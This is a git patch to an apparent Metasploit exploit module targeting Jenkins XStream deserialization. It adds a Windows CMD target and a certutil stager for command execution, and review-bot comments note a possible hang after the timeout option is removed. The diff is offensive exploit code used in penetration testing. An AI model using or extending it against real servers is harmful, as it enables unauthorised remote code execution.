From 293969599150831e1bf3b0f7cc8798524fa6154d Mon Sep 17 00:00:00 2001
From: attackdebris
Date: Mon, 26 Feb 2018 16:59:36 -0500
Subject: [PATCH] Add ARCH_CMD and general fixup
---
 .../multi/http/jenkins_xstream_deserialize.rb | 25 +++++++++++++------
 1 file changed, 18 insertions(+), 7 deletions(-)
diff --git a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
index 5f8072ded1..4b6f3472c1 100644
--- a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
+++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
@@ -47,6 +47,16 @@ class MetasploitModule < Msf::Exploit::Remote
 'Platform' => 'win',
 'Arch' => [ARCH_X86, ARCH_X64]
 ],
+ ['Windows (CMD)',
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_CMD],
+ 'Payload' => {
+ 'Compat' => {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'adduser, generic'
+ }
+ }
+ ],
 ['Linux (Dropper)',
 'Platform' => 'linux',
 'Arch' => [ARCH_X86, ARCH_X64]
@@ -62,7 +72,6 @@ class MetasploitModule < Msf::Exploit::Remote
 register_options([
 OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
 OptString.new('PSH_PATH', [false, 'Path to powershell.exe', '']),
- OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for connect back", 30]),
 Opt::RPORT('8080')
 ])
 deregister_options('URIPATH')
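Review bot: The `OptInt.new("ListenerTimeout", ...)` registration removed from `register_options` is still the value the renamed `wait_for_session` reads in the last hunk (`Timeout.timeout(datastore['ListenerTimeout'])`), and nothing in this diff registers it again. Unless the option is declared elsewhere in the file (not visible here), the datastore lookup returns nil and `Timeout.timeout(nil)` never expires, so the PowerShell and cmdstager paths that now call `wait_for_session` in the third hunk would block indefinitely on a failed connect-back. If the removal is meant as deduplication of an existing registration, that is worth stating in the commit message; otherwise keep the option or give the wait a floor, e.g. `Timeout.timeout(datastore['ListenerTimeout'] || 30) do`.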
@@ -88,22 +97,25 @@ class MetasploitModule < Msf::Exploit::Remote def exploit case target.name - when /Unix/, /Python/, /PowerShell/ + when /Unix/, /Python/, /CMD/ execute_command(payload.encoded) + when /PowerShell/ + execute_command(payload.encoded) + wait_for_session else - execute_cmdstager + execute_cmdstager({:flavor => :certutil}) + wait_for_session end end # Exploit methods - def execute_command(cmd, opts = {}) cmd = case target.name when /Unix/, /Linux/ %W{/bin/sh -c #{cmd}} when /Python/ %W{python -c #{cmd}} - when /Windows/ + when /Windows/, /CMD/ %W{cmd.exe /c #{cmd}} when /PowerShell/ psh_opts = { :remove_comspec => true, :wrap_double_quotes => true } @@ -120,10 +132,9 @@ class MetasploitModule < Msf::Exploit::Remote 'ctype' => 'application/xml', 'data' => xstream_payload(cmd) ) - wait_for_powershell_session end - def wait_for_powershell_session + def wait_for_session print_status "Waiting for exploit to complete..." begin Timeout.timeout(datastore['ListenerTimeout']) do
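Review bot: `execute_cmdstager({:flavor => :certutil})` in the `else` branch of `exploit` spells the options hash out with braces and hashrockets where the idiomatic Ruby call is `execute_cmdstager(flavor: :certutil)`. The new `/PowerShell/` branch repeats the `execute_command(payload.encoded)` line from the branch above it and differs only by the trailing `wait_for_session`, so the `case` could run `execute_command(payload.encoded)` once for the non-stager targets and follow it with `wait_for_session if target.name =~ /PowerShell/`. In `execute_command`, the added `/CMD/` alternative on `when /Windows/, /CMD/` is redundant for the new 'Windows (CMD)' target because its name already matches `/Windows/`; harmless, but a short comment would stop the next reader from wondering which target it was meant for. The body of `execute_command` continues past the end of the hunk.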